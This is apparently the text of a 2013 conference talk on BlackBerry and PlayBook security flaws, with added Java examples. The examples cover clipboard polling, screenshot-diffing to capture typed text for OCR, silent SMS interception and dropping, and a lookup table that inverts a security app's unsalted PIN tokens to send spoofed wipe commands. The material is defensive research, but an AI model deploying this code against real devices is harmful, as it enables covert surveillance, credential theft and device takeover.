SECURITY EVALUATION, OR ESCAPING FROM "VULNERABILITY PRISON"
Ph.D. YURY CHEMERKIN
NULLCON GOA 2013
BLACKBERRY SECURITY ENVIRONMENT
THE BLACKBERRY SMARTPHONE WAS SECURE… THE PLAYBOOK HAS COME WITH A POOR ENVIRONMENT

BLACKBERRY SMARTPHONE
• SECURITY IS THE CORNERSTONE
• A POWERFUL HIGH-LEVEL INTEGRATION
  • IMs, SOCIAL NETWORKS
  • FINANCIAL DATA, ETC.
• THE BLACKBERRY WAS BUILT
  • FREE OF MALWARE & HARMFUL ACTIONS
  • WITH NATIVE SECURITY SOLUTIONS
• MAINLY FOCUSED ON ENTERPRISE
  • A WIDE IT POLICY SET
  • UP TO 500 UNITS
  • A FEW THIRD-PARTY SECURITY SOLUTIONS

BLACKBERRY PLAYBOOK
• A SIMPLIFICATION OF THE SECURITY VISION
• POOR INTEGRATION (ONLY BLACKBERRY BRIDGE)
  • NO BUILT-IN IMs, HTML5 & WEB LAUNCHER
  • NO WALLET OR OTHER BUILT-IN APPLICATIONS
• THE PLAYBOOK MIGHT
  • PRODUCE LITTLE VALUABLE DATA, BECAUSE OF ITS APIs
  • BE NOT MUCH MORE THAN A LARGE PHONE SCREEN
• TOTALLY FOCUSED ON ENTERPRISE
  • THE IT POLICY SET IS REDUCED FURTHER
  • UP TO 10 UNITS
  • ENTERTAINMENT APPLICATIONS ONLY
USER-MODE ROOTKIT AND SPYWARE
MALWARE BOUNDARIES BECOME UNCLEAR… HACKERS ARE INTERESTED IN CHEAPER COSTS

• A LOT OF TYPES
  • BOOTKITS
  • FIRMWARE
  • USER-MODE
  • KERNEL
  • HYPERVISOR
• SIMILAR TO SPYWARE
  • BUNDLED WITH DESIRABLE SOFTWARE
  • WIDESPREAD, EASY DISTRIBUTION AND QUITE RELEVANT FOR HACKERS
• METHODS, BASED ON:
  • VENDOR-SUPPLIED EXTENSIONS
  • THIRD-PARTY PLUGINS
  • PUBLIC INTERFACES
  • INTERCEPTION OF SYSTEM MESSAGES
  • EXPLOITATION OF SECURITY VULNERABILITIES
  • HOOKING AND PATCHING OF APIs
THE FILE SYSTEM ISSUES
BBOS v4–5 WAS ACCESSIBLE; BBOS v6–7 PLUS THE PLAYBOOK ARE ACCESSIBLE

BLACKBERRY OS 4–5
• VIA THE BUILT-IN (INTERNAL) EXPLORER
  • AFTER ENTERING THE PASSWORD, BUT STILL THROUGH THE INTERNAL EXPLORER
  • FOR EXECUTING MALWARE FROM THE DEVICE BY CLICKING A FILE (.JAR/.JAD + .COD)
  • TO ALLOW COPYING THE MALWARE ONTO THE DEVICE MOUNTED AS AN EXTERNAL DRIVE (LIKE A WORM)
• ALL DATA IS ACCESSIBLE EXCEPT APP & SYSTEM DATA, WITHOUT ANY API OR OTHER INFO

BLACKBERRY OS 6–7 AND PLAYBOOK
• AFTER MOUNTING AS AN EXTERNAL DRIVE(S)
  • AFTER ENTERING THE PASSWORD, BUT IT IS NOT NECESSARY TO USE THE INTERNAL EXPLORER
  • TO PREVENT EXECUTING ANYTHING OUTSIDE APPWORLD (.BAR)
• MALWARE IS A "PERSONAL APPLICATION" SUBTYPE IN TERMS OF RIM's SECURITY
• THE SANDBOX PROTECTS ONLY APP DATA, WHILE USER DATA IS STORED IN SHARED FOLDERS
THE APPLICATION MANAGEMENT ISSUES

BLACKBERRY SMARTPHONE (BELOW BB10)
• THE "UPGRADE" FEATURE MEANS
  • THE INSTALL & REMOVE ACTIONS, AT LEAST
  • AN APPLICATION ID REQUIREMENT
  • AN ACCESSIBLE RUNNING APPLICATION LIST
  • HANDLING ANOTHER APP SILENTLY VIA API
• HANDLING ANOTHER APPLICATION SILENTLY VIA PC TOOLS
  • MAY NEED A PASSWORD
  • DEBUG MODE IS FOR TRACING & DEBUGGING ONLY
• EASY TRACKING OF NEWLY ARRIVING .COD MODULES FOR THE MALWARE PAYLOAD

BLACKBERRY PLAYBOOK (PROBABLY BLACKBERRY 10 TOO)
• THE "UPGRADE" MEANS USER INTERACTION
  • WITH APPWORLD
  • WITH THE HOME SCREEN
  • THERE ARE SOME APIs, BUT DISABLED
  • THERE IS NO API FOR SUCH ACTIONS YET
• HANDLING ANOTHER APPLICATION SILENTLY VIA PC TOOLS
  • MAY NEED A PASSWORD
  • STRONGLY NEEDS AN ACTIVATED DEBUG MODE
• LOOKS MORE SECURE THAN THE BLACKBERRY SMARTPHONE, BUT DISTRIBUTED MALWARE IS DIFFICULT TO REMOVE
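The two smartphone-side points above (new .COD modules are easy to track; an installed .COD can be removed silently via API) rest on the same BlackBerry Java class. The monitor below is an added example written for this page, not the talk's code and not RIM's; it assumes the BlackBerry OS 4–7 Java API (net.rim.device.api.system.CodeModuleManager) and the JDE simulator console. It only reads the module list: a security product can run it to notice its own modules disappearing, and a dropper would run the same calls to watch for its payload landing. The removal call the slide refers to is CodeModuleManager.deleteModuleEx(handle, true); it is named in a comment and never invoked.

```java
import java.util.Enumeration;
import java.util.Hashtable;
import java.util.Timer;
import java.util.TimerTask;

import net.rim.device.api.system.Application;
import net.rim.device.api.system.CodeModuleManager;

// Added illustration for the application-management slide; not the talk's code and not RIM's.
// Assumes the BlackBerry OS 4-7 Java API. Lists installed .COD modules by name on a timer and
// reports every module that appears or disappears between two snapshots. A silent removal
// (CodeModuleManager.deleteModuleEx(handle, true) from another app, or from PC tools) shows up
// here as "module removed" on the next tick.
public final class ModuleMonitor extends Application {
    private static final long PERIOD_MS = 5000;     // assumption: 5 s is fine for a demo
    private Hashtable known;                         // module name -> Integer handle

    public static void main(String[] args) {
        new ModuleMonitor().enterEventDispatcher();
    }

    private ModuleMonitor() {
        known = snapshot();                          // baseline: everything installed right now
        new Timer().schedule(new TimerTask() {
            public void run() { diff(); }
        }, PERIOD_MS, PERIOD_MS);
    }

    // Current module table keyed by module name.
    static Hashtable snapshot() {
        Hashtable modules = new Hashtable();
        int[] handles = CodeModuleManager.getModuleHandles();
        for (int i = 0; i < handles.length; i++) {
            modules.put(CodeModuleManager.getModuleName(handles[i]), new Integer(handles[i]));
        }
        return modules;
    }

    // Entries of `a` whose name is absent from `b`.
    static Hashtable missingFrom(Hashtable a, Hashtable b) {
        Hashtable out = new Hashtable();
        for (Enumeration e = a.keys(); e.hasMoreElements();) {
            Object name = e.nextElement();
            if (!b.containsKey(name)) out.put(name, a.get(name));
        }
        return out;
    }

    private void diff() {
        Hashtable current = snapshot();
        Hashtable added = missingFrom(current, known);   // "newcoming" .COD modules
        Hashtable removed = missingFrom(known, current); // e.g. a security product's .COD deleted
        for (Enumeration e = added.keys(); e.hasMoreElements();) {
            System.out.println("new module: " + e.nextElement());
        }
        for (Enumeration e = removed.keys(); e.hasMoreElements();) {
            System.out.println("module removed: " + e.nextElement());
        }
        known = current;
    }
}
```

Detection after the fact is all this buys: nothing in the platform lets the monitored application veto the deletion, which is the gap the slide is pointing at.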
THE CLIPBOARD ISSUES

BLACKBERRY SMARTPHONE
• HOW TO REVEAL THE DATA IN REAL TIME
  • getClipboard()
• ANY PROTECTION?
  • NATIVE WALLETS RESTRICT CLIPBOARD ACCESS BY RETURNING "NULL"
    • ONLY WHILE THE APPLICATION IS ACTIVE (ON TOP OF THE SCREEN STACK)
    • DOES NOT WORK IN THE MINIMIZED STATE

BLACKBERRY PLAYBOOK
• HOW TO REVEAL THE DATA IN REAL TIME
  • getData()
• ANY PROTECTION?
  • NO NATIVE WALLET APPLICATION
  • THE LAST CLIPBOARD DATA IS MANAGED VIA A SHARED FOLDER
    • PLAIN TEXT
    • HTML
    • ETC.
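The smartphone column above describes both halves of the problem: any application can poll the system clipboard, and the native wallet's "null" trick only holds while the wallet is on top. The demo below is an added example for this page, not the talk's code and not RIM's. It assumes the BlackBerry OS 4–7 Java API (net.rim.device.api.system.Clipboard, net.rim.device.api.ui.*) and the JDE simulator; the card number is a constructed sample and the 10-second lifetime is an arbitrary choice. One app plays both roles: a wallet-style screen that copies a secret, and the polling loop a third-party app could run. The mitigation it shows is the only one left to the application: wipe the clipboard the moment the app leaves the foreground, which is exactly the minimized case the slide says the native wallet misses.

```java
import java.util.Timer;
import java.util.TimerTask;

import net.rim.device.api.system.Clipboard;
import net.rim.device.api.ui.Field;
import net.rim.device.api.ui.FieldChangeListener;
import net.rim.device.api.ui.UiApplication;
import net.rim.device.api.ui.component.BasicEditField;
import net.rim.device.api.ui.component.ButtonField;
import net.rim.device.api.ui.container.MainScreen;

// Added illustration for the clipboard slide; not the talk's code and not RIM's.
// Assumes the BlackBerry OS 4-7 Java API and the JDE simulator console.
public final class ClipboardWipeDemo extends UiApplication {
    private static final long POLL_MS = 250;
    private static final long SECRET_TTL_MS = 10000;   // assumption: a paste takes well under 10 s

    private final Timer timer = new Timer();
    private TimerTask expiry;
    private Object lastSeen;

    public static void main(String[] args) {
        new ClipboardWipeDemo().enterEventDispatcher();
    }

    private ClipboardWipeDemo() {
        pushScreen(new WalletScreen());
        // The "spyware" side of the slide: Clipboard.getClipboard().get() is a plain
        // system-wide read, so any installed app can run this loop.
        timer.schedule(new TimerTask() {
            public void run() { observe(); }
        }, 0, POLL_MS);
    }

    private void observe() {
        Object now = Clipboard.getClipboard().get();
        if (now != null && !"".equals(now) && !now.equals(lastSeen)) {
            lastSeen = now;
            System.out.println("visible to every app: " + now);
        }
    }

    // Publish the secret for a bounded time only.
    void copySecret(String secret) {
        Clipboard.getClipboard().put(secret);
        if (expiry != null) expiry.cancel();
        expiry = new TimerTask() { public void run() { wipe(); } };
        timer.schedule(expiry, SECRET_TTL_MS);
    }

    // Application.deactivate() runs when the app is sent to the background:
    // the minimized case where the native wallet's "null" protection no longer applies.
    protected void deactivate() {
        wipe();
        super.deactivate();
    }

    private void wipe() {
        Clipboard.getClipboard().put("");   // put() replaces the previous contents
        lastSeen = null;
    }

    private final class WalletScreen extends MainScreen {
        WalletScreen() {
            setTitle("Wallet demo");
            // Constructed sample value, not real card data.
            final BasicEditField card = new BasicEditField("Card: ", "4111 1111 1111 1111");
            add(card);
            ButtonField copy = new ButtonField("Copy", ButtonField.CONSUME_CLICK);
            copy.setChangeListener(new FieldChangeListener() {
                public void fieldChanged(Field f, int context) { copySecret(card.getText()); }
            });
            add(copy);
        }
    }
}
```

Run it in the simulator, press Copy, and the console prints the value once from the poller; minimize the app (or wait out the TTL) and the clipboard is empty before anyone else polls again. Note that between Copy and the wipe the secret is still world-readable, so a wallet that can avoid the shared clipboard entirely should.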
THE PHOTOSCREEN (SCREENSHOT) ISSUES
AVAILABLE ON ALL BLACKBERRY DEVICES, BUT DISABLED ON THE PLAYBOOK AND BLACKBERRY 10 YET

• SCREEN PROTECTION VIA SWITCHING
  • PERMIT
  • RESTRICT
  • ADDITIONALLY PER APPLICATION…
  • BUT DOES NOT HANDLE WINDOWS
• CATCHES THE KEY PREVIEW OF THE VIRTUAL KEYBOARD
  • MAY BE IMPROVED BY XOR'ing TWO PHOTOSCREENS TO GET THE DIFFERENCE
  • MASKING WITH ASTERISKS TAKES A DELAY, ENOUGH TO STEAL THE TEXT
• MAY BE FED INTO OCR ENGINES
  • ONLINE OR DESKTOP
  • THEY RECOGNIZE TYPED DATA VERY QUICKLY
  • WAS TESTED ON ABBYY ONLINE OCR
• A SUBSTITUTE FOR A HARDWARE KEYLOGGER
  • RUNS DOWN THE BATTERY MORE SLOWLY THAN THE PHOTO/VIDEO CAMERA
• EASY ACCESS TO ANY APPLICATION… EVEN THE WALLET
  • NO RESTRICTION LIKE THE CLIPBOARD "NULL"
• SCREENSHOTS ARE OFTEN STORED IN THE CAMERA FOLDER
  • SO THE SAME FILE ACCESS ISSUES APPLY
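The XOR idea in the slide is what makes the screenshot route practical: two full frames a few tens of milliseconds apart differ only where the key-preview bubble or the not-yet-masked character appeared, and that small crop is what goes to OCR. The code below is an added example for this page, not the talk's code and not RIM's; it assumes the BlackBerry OS 4–7 Java API, where a code-signed application may call Display.screenshot(Bitmap) (per the slide, gated only by the combined camera permission). changedRegion() is plain Java and works on any two equally sized ARGB arrays.

```java
import net.rim.device.api.system.Bitmap;
import net.rim.device.api.system.Display;

// Added illustration for the photoscreen slide; not the talk's code and not RIM's.
// Assumes the BlackBerry OS 4-7 Java API (Display.screenshot needs a signed app).
public final class FrameDiff {
    // Bounding box {left, top, right, bottom} of pixels that differ between two
    // ARGB frames of the same size, or null when the frames are identical.
    static int[] changedRegion(int[] a, int[] b, int width, int height) {
        int left = width, top = height, right = -1, bottom = -1;
        for (int y = 0; y < height; y++) {
            for (int x = 0; x < width; x++) {
                int i = y * width + x;
                // XOR of two pixels is zero exactly when they are identical; the alpha
                // byte is masked off because screenshots carry a constant alpha.
                if (((a[i] ^ b[i]) & 0x00FFFFFF) != 0) {
                    if (x < left) left = x;
                    if (x > right) right = x;
                    if (y < top) top = y;
                    if (y > bottom) bottom = y;
                }
            }
        }
        return right < 0 ? null : new int[] { left, top, right, bottom };
    }

    // Whole display as ARGB pixels.
    static int[] grab(int width, int height) {
        Bitmap shot = new Bitmap(width, height);
        Display.screenshot(shot);
        int[] px = new int[width * height];
        shot.getARGB(px, 0, width, 0, 0, width, height);
        return px;
    }

    // Two captures `gapMs` apart; returns only the region that changed, cropped from
    // the second frame, ready to be saved or posted to an OCR engine.
    static Bitmap captureDelta(long gapMs) throws InterruptedException {
        int w = Display.getWidth(), h = Display.getHeight();
        int[] before = grab(w, h);
        Thread.sleep(gapMs);                      // assumption: shorter than the masking delay
        int[] after = grab(w, h);
        int[] box = changedRegion(before, after, w, h);
        if (box == null) return null;
        int bw = box[2] - box[0] + 1, bh = box[3] - box[1] + 1;
        int[] crop = new int[bw * bh];
        for (int y = 0; y < bh; y++) {
            System.arraycopy(after, (box[1] + y) * w + box[0], crop, y * bw, bw);
        }
        Bitmap out = new Bitmap(bw, bh);
        out.setARGB(crop, 0, bw, 0, 0, bw, bh);
        return out;
    }
}
```

The defensive reading of the same code: an application that renders secrets has to assume any signed app can run grab() at will, so password entry on this platform should be treated as observable regardless of the asterisk masking.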
THE MESSAGES ISSUES
AVAILABLE ON THE BB DEVICES, PROBABLY ON BLACKBERRY 10; NO 3G AND NO API ON THE PLAYBOOK

• USING AUTHORIZED APIs TO INTERCEPT
  • MESSAGES (BBM, EMAIL, PIN-TO-PIN)
    • CREATE THE MESSAGE
    • READ THE MESSAGE
    • DELETE THE MESSAGE
    • SET THE MESSAGE STATUS (UNREAD, SENT, ANY ERROR STATE, ETC.)
  • THE BUTTON EVENTS (THE SAME TYPES)
    • OPENING THE MESSAGE
    • FORWARDING THE MESSAGE
    • SENDING THE MESSAGE
• INTERCEPTING SMS (BASIC)
  • RECEIVING AND SENDING EVENTS
  • DELETING THE SENT & RECEIVED SMS
  • ENOUGH TO HANDLE SOCIAL C&C SMS
• OUTGOING SMS (ADVANCED)
  • BLOCKING (DROPPING) THE SMS
    • A NOTIFICATION IN THE MESSAGE THREAD
  • SPOOFING
    • THE RECIPIENT
    • THE BODY
  • "TRANSMISSION REFUSED BY …" IF SUCH A MESSAGE WAS NOT REMOVED
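The "receiving and sending events" and "blocking (dropping) the SMS" items above come down to two hooks in the BlackBerry Java API, and they are the same hooks an SMS-firewall product uses. The class below is an added example for this page, not the talk's code and not RIM's; it assumes the BlackBerry OS 4.1–7 API (net.rim.blackberry.api.sms.SendListener and a javax.wireless.messaging listener on "sms://:0"), and the "#wipe" prefix is a constructed stand-in for whatever an SMS C&C scheme might use.

```java
import java.io.IOException;

import javax.microedition.io.Connector;
import javax.wireless.messaging.Message;
import javax.wireless.messaging.MessageConnection;
import javax.wireless.messaging.MessageListener;
import javax.wireless.messaging.TextMessage;

import net.rim.blackberry.api.sms.SMS;
import net.rim.blackberry.api.sms.SendListener;
import net.rim.device.api.system.Application;

// Added illustration for the messages slide; not the talk's code and not RIM's.
// Assumes the BlackBerry OS 4.1-7 Java API. The outgoing hook decides whether a
// message leaves the device at all; the incoming hook on port 0 sees every SMS.
public final class SmsHooks extends Application implements SendListener, MessageListener {
    static final String CC_PREFIX = "#wipe";   // constructed sample rule, not a real product's syntax

    private final MessageConnection inbound;

    public static void main(String[] args) throws IOException {
        new SmsHooks().enterEventDispatcher();
    }

    private SmsHooks() throws IOException {
        SMS.addSendListener(this);                                  // every outgoing SMS passes here first
        inbound = (MessageConnection) Connector.open("sms://:0");   // port 0: all incoming SMS
        inbound.setMessageListener(this);
    }

    // SendListener: return false and the SMS is silently dropped; true lets it go out.
    // A firewall uses this to stop premium-rate or C&C traffic; spyware uses it to
    // hide its own commands from the user, exactly as the slide describes.
    public boolean sendMessage(Message m) {
        if (m instanceof TextMessage) {
            String body = ((TextMessage) m).getPayloadText();
            if (body != null && body.startsWith(CC_PREFIX)) {
                System.out.println("dropped outgoing SMS to " + m.getAddress() + ": " + body);
                return false;
            }
        }
        return true;
    }

    // MessageListener: invoked for each arriving SMS; receive() pulls it off the connection.
    // (Real code would hand this to a worker thread rather than block the listener.)
    public void notifyIncomingMessage(MessageConnection conn) {
        try {
            Message m = conn.receive();
            if (m instanceof TextMessage) {
                System.out.println("inbound from " + m.getAddress() + ": "
                        + ((TextMessage) m).getPayloadText());
            }
        } catch (IOException e) {
            System.out.println("receive failed: " + e);
        }
    }
}
```

Nothing here asks the user anything: the app needs the ordinary messaging permission and then sees and vetoes SMS traffic for every other application on the device, which is why the slide classes SMS-based command channels as interceptable.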
THE DEVICE PASSWORD ISSUES
BLACKBERRY 4–7 IN THE INTERNAL CASE; ALL DEVICES IN THE DESKTOP ACCESS CASE

BLACKBERRY 4–7: THE INTERNAL CASE
• THE PASSWORD PROTECTION COVERS
  • DEVICE LOCKING & THE ENCRYPTION FEATURE
  • APPWORLD REQUESTS
  • LIMITED TO 5/10 ATTEMPTS, THEN WIPE
    • WIPES THE INTERNAL STORAGE ONLY
• EXTRACTING THE PASSWORD THROUGH
  • AN ELCOMSOFT PRODUCT (CUSTOM CASE)

ALL DEVICES: THE DESKTOP ACCESS CASE
• A GUI VULNERABILITY
  • CREATING A FAKE WINDOW DURING DESKTOP SYNCHRONIZATION
  • BREAKING INTO THE BB DESKTOP SOFTWARE
• HANDLING THE DESKTOP SOFTWARE VULNERABILITY
  • UNMASKING THE FIELD
  • GRABBING THE PASSWORD
  • MASKING THE FIELD AGAIN
  • THE DELAY TAKES NO MORE THAN 15 MSEC
• AFFECTED PASSWORD TYPES
  • THE DEVICE PASSWORD
  • THE BACKUP PASSWORD
• AFFECTED DEVICES
  • BLACKBERRY 4–7 (BB 10 HIGHLY PROBABLY)
  • BLACKBERRY PLAYBOOK
THE GUI EXPLOITATION
A CONSEQUENCE OF THE WIDE INTEGRATION FEATURES OFFERED TO DEVELOPERS (BLACKBERRY 4–7 ONLY)

• INITIALLY BASED ON THE AUTHORIZED API, WHICH COVERED
  • ALL PHYSICAL & NAVIGATION BUTTONS
  • TYPING OF TEXTUAL DATA
  • AFFECTS ALL NATIVE & THIRD-PARTY APPs
• SECONDARILY BASED ON ADDING MENU ITEMS
  • INTO THE GLOBAL MENU
  • INTO THE "SEND VIA" MENU
  • AFFECTS ALL NATIVE APPLICATIONS
    • NATIVE APPLICATIONS ARE DEVELOPED BY RIM
    • BLACKBERRY WALLET, MESSAGES, SETTINGS, FACEBOOK, TWITTER, …
    • BBM/GTALK/YAHOO/WINDOWS IMs, …
• GUI EXPLOITATION HANDLES
  • REDRAWING THE SCREENS
  • ADDING NEW GUI OBJECTS
  • CHANGING THEIR PROPERTIES
  • GRABBING THE TEXT FROM
    • ANY FIELD (INCL. PASSWORD FIELDS)
    • THE DEVICE-UNLOCK FIELD
    • THE PASSWORD-SETUP FIELD
  • ADDING OR REMOVING FIELD DATA
  • THE ORIGINAL DATA IS INACCESSIBLE BUT NOT AFFECTED
• SHUFFLING GUI OBJECTS IS NOT POSSIBLE
THE THIRD-PARTY EXPLOITATION
THERE ARE A FEW OF THEM; THEY MAY BE EXPLOITABLE THEMSELVES, AND THEY UNDERMINE THE NATIVE SECURITY

KASPERSKY MOBILE SECURITY PROVIDES
• FIREWALL, WIPE, BLOCK, INFO FEATURES
• NO PROTECTION FROM REMOVING ITS .CODs
• NO PROTECTION UNDER THE SIMULATOR
  • EXAMINING THE TRAFFIC AND BEHAVIOUR
  • SHOULD CHECK THE "IS SIMULATOR" API
• SMS MANAGEMENT ("QUITE" SECRET SMS)
  • THE PASSWORD IS A FOUR- TO SIXTEEN-DIGIT SET
  • …AND CAN BE MODIFIED IN REAL TIME
  • THE SMS CARRIES HALF OF A GOST R 34.11-94 HASH VALUE
  • THE IMPLEMENTATION USES TEST CRYPTO VALUES AND NO SALT
  • TABLES (VALUE → HASH) ARE EASILY BUILT
  • OUTGOING SMS CAN BE SPOOFED WITHOUT ANY NOTIFICATION
  • OUTGOING SMS CAN BLOCK OR WIPE THE SAME DEVICE OR ANOTHER DEVICE

McAfee MOBILE SECURITY PROVIDES
• FIREWALL, WIPE, BLOCK, INFO FEATURES
• NO PROTECTION FROM REMOVING ITS .CODs
• NO PROTECTION UNDER THE SIMULATOR
  • EXAMINING THE TRAFFIC AND BEHAVIOUR
  • SHOULD CHECK THE "IS SIMULATOR" API
• WEB MANAGEMENT CONSOLE
  • DIFFICULT TO BREAK THE SMS C&C
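Why "tables are easily built" follows from "no salt" plus a digit-only password, as an added example for this page (not the talk's code and not the vendor's): the program below assumes desktop Java with Bouncy Castle (bcprov) on the classpath. Its GOST3411Digest() no-arg constructor uses the GOST "test" S-box parameter set, matching the "test crypto values" point on the slide. Which half of the 32-byte digest the SMS carries and how the password string is encoded before hashing are assumptions here; the lookup-table attack does not depend on them, only on the absence of a per-device salt.

```java
import java.util.Hashtable;

import org.bouncycastle.crypto.Digest;
import org.bouncycastle.crypto.digests.GOST3411Digest;
import org.bouncycastle.util.encoders.Hex;

// Added illustration for the SMS C&C point; not the talk's code and not the vendor's.
// Assumes Bouncy Castle on the classpath. GOST3411Digest() = GOST R 34.11-94 with the
// "test" S-boxes; the leading half of the digest is taken as the SMS token (assumption).
public final class PinTable {
    private final Hashtable table = new Hashtable();   // hex token -> PIN

    // Unsalted, unkeyed: the same PIN yields the same token on every device, so one
    // table built once inverts every intercepted SMS.
    static String token(String pin) {
        Digest d = new GOST3411Digest();
        byte[] in = pin.getBytes();                    // assumption: ASCII digits, no terminator
        d.update(in, 0, in.length);
        byte[] out = new byte[d.getDigestSize()];      // 32 bytes
        d.doFinal(out, 0);
        byte[] half = new byte[16];
        System.arraycopy(out, 0, half, 0, 16);
        return Hex.toHexString(half);
    }

    // Enumerate every PIN of `digits` digits: 10^4 entries for the four-digit minimum.
    PinTable(int digits) {
        int limit = 1;
        for (int i = 0; i < digits; i++) limit *= 10;
        for (int n = 0; n < limit; n++) {
            String pin = Integer.toString(n);
            while (pin.length() < digits) pin = "0" + pin;
            table.put(token(pin), pin);
        }
    }

    // Invert an intercepted token in one hash-table lookup.
    String lookup(String tokenHex) {
        return (String) table.get(tokenHex);
    }

    // What a salted, iterated scheme would look like with the same digest: the table
    // has to be rebuilt per device and each entry costs `iterations` hashes. A short
    // all-digit PIN stays weak regardless, so this is a mitigation, not a fix.
    static String saltedToken(String pin, byte[] deviceSalt, int iterations) {
        Digest d = new GOST3411Digest();
        byte[] cur = pin.getBytes();
        for (int i = 0; i < iterations; i++) {
            d.reset();
            d.update(deviceSalt, 0, deviceSalt.length);
            d.update(cur, 0, cur.length);
            byte[] next = new byte[d.getDigestSize()];
            d.doFinal(next, 0);
            cur = next;
        }
        return Hex.toHexString(cur);
    }

    public static void main(String[] args) {
        PinTable t = new PinTable(4);                      // builds in well under a second
        String intercepted = token("7391");                // constructed: what an intercepted SMS would carry
        System.out.println("recovered PIN: " + t.lookup(intercepted));
        byte[] salt = "device-PIN-2A3B".getBytes();        // constructed per-device value
        System.out.println("salted token: " + saltedToken("7391", salt, 10000));
    }
}
```

Combine this with the SMS hooks from the messages slide and the chain on the slide is complete: intercept the token, recover the PIN from the table, then send a spoofed command that blocks or wipes the device.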
THE PERMISSIONS
PRIVILEGED GENERAL PERMISSIONS; OWN APPs, NATIVE & 3RD-PARTY APPs FEATURES

• DENIAL OF SERVICE
  • REPLACING/REMOVING EXECUTABLE FILES
  • DoS'ing EVENTS, NOISING FIELDS
  • GUI INTERCEPT
• INFORMATION DISCLOSURE
  • CLIPBOARD, SCREEN CAPTURE
  • GUI INTERCEPT
  • DUMPING .COD FILES, SHARED FILES
• MITM (INTERCEPTION / SPOOFING)
  • MESSAGES
  • GUI INTERCEPT, THIRD-PARTY APPs
  • FAKE WINDOW / CLICKJACKING

• GENERAL PERMISSIONS
  • INSTEAD OF SPECIFIC SUB-PERMISSIONS
  • A FEW NOTIFICATION/EVENT LOGS FOR THE USER
  • BUILT PER APPLICATION INSTEAD OF PER APP SCREEN
• CONCRETE PERMISSIONS
  • BUT COMBINED INTO A GENERAL PERMISSION
  • A SCREENSHOT PERMISSION IS PART OF THE CAMERA PERMISSION
CONCLUSION
THE VENDOR'S SECURITY VISION HAS NOTHING TO DO WITH REALITY, AGGRAVATED BY SIMPLICITY

• SIMPLIFICATION AND REDUCTION OF SECURITY CONTROLS
  • MANY GENERAL PERMISSIONS, COMBINED INTO EACH OTHER
  • NO ACTIVITY LOGS FOR SUB-PERMISSIONS TO PROVE TRANSPARENCY
  • ANY SECURITY VULNERABILITY IS ONLY FIXED BY AN ENTIRELY NEW AND DIFFERENT OS / KERNEL
  • A FEW PERMISSIONS ARE CLOSED TO USER ACTIONS
• THE SANDBOX PROTECTS ONLY APPLICATION DATA
  • USERS HAVE TO STORE THEIR DATA IN SHARED FOLDERS OR EXTERNAL STORAGE
  • APPLICATIONS KEEP STORING DATA IN PUBLIC FOLDERS BECAUSE AVAILABILITY DECIDES WHERE DATA GOES
• MITM / INTERCEPTION ACTIONS ARE OFTEN SILENT
  • THE NATIVE SPOOFING AND INTERCEPTION FEATURES
  • BLACKBERRY ENTERPRISE SOLUTION / BLACKBERRY MOBILE FUSION IS NOT VERY EFFECTIVE
• THE BEST SECURITY (PERMISSIONS) MODEL IS THE ONE RULED BY AMAZON WEB SERVICES
  • PERMISSIONS SHOULD RELY ON A SET OF USEFUL CASES INSTEAD OF A SPECIFIC PERMISSION LIST
THANK YOU
YURY CHEMERKIN